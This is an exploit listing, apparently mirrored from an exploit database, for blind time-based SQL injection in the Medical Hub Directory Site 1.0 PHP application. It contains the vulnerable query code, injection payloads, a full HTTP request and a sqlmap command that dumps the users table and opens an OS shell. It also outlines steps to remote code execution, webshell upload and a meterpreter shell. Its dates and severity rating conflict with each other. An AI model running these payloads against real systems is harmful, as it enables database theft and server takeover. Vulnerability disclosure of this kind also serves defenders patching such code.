Exploit for Medical Hub Directory Site 1.0 SQL Injection

Name: Exploit for Medical Hub Directory Site 1.0 SQL Injection
Rating: 5 (251 reviews)
2022-03-31 | CVSS 0.1
## https://sploitus.com/exploit?id=PACKETSTORM:166550
# Title: Medical Hub Directory Site 1.0 Blind Time SQLi To Rce  
# Author: Hejap Zairy  
# Date: 30.07.2022  
# Vendor: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html  
# Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/mhds.zip  
# Reference: https://github.com/Matrix07ksa  
# Tested on: Windows, MySQL, Apache  
  
  
  
# Steps  
# 1.- Go to : https://0day.gov//mhds/admin/?page=category/manage_category&id=6  
# 2 - manual inject Blind SQli Payload: https://0day.gov//mhds/admin/?page=category/manage_category&id=6 OR NOT 8425=8425#&password=hejap&button=Login  
# 3 - SQLi To RCE r00t  
# 4 - Ubload webshell   
# 5 - Web Shell to meterpreter full tty shell  
  
#vulnerability Code php  
  
---  
```  
<?php   
if(isset($_GET['id'])){  
$qry = $conn->query("SELECT * FROM `category_list` where id = '{$_GET['id']}' and delete_flag = 0 ");  
if($qry->num_rows > 0 ){  
foreach($qry->fetch_array() as $k => $v){  
if(!is_numeric($k))  
$$k = $v;  
}  
}  
}  
?>  
```  
---  
#Status: CRITICAL  
[+] Payload GET  
  
---  
GET /mhds/admin/?page=category/manage_category&id=6 HTTP/1.1  
Host: 0day.gov  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: PHPSESSID=ahm8bmdjtm25mldhc2rm7dc4f2  
Upgrade-Insecure-Requests: 1  
Cache-Control: max-age=0  
---  
  
```  
---  
Parameter: id (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: page=category/manage_category&id=6' AND (SELECT 8526 FROM (SELECT(SLEEP(5)))jfSR) AND 'KRZU'='KRZU  
---  
  
  
```  
#Blind SQLi Time to Rce  
#ُExploit   
  
  
sqlmap -r hejap_0day --dbs --time-sec=10 --tamper=space2comment --threads=5 -p id -D mhds_db -T users --dump --eta --technique=t --hex --os-shell  
  
  
# Description:  
The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc  
  
# Proof and Exploit:  
https://i.imgur.com/Siu2l0C.png  
https://i.imgur.com/fU4As6a.png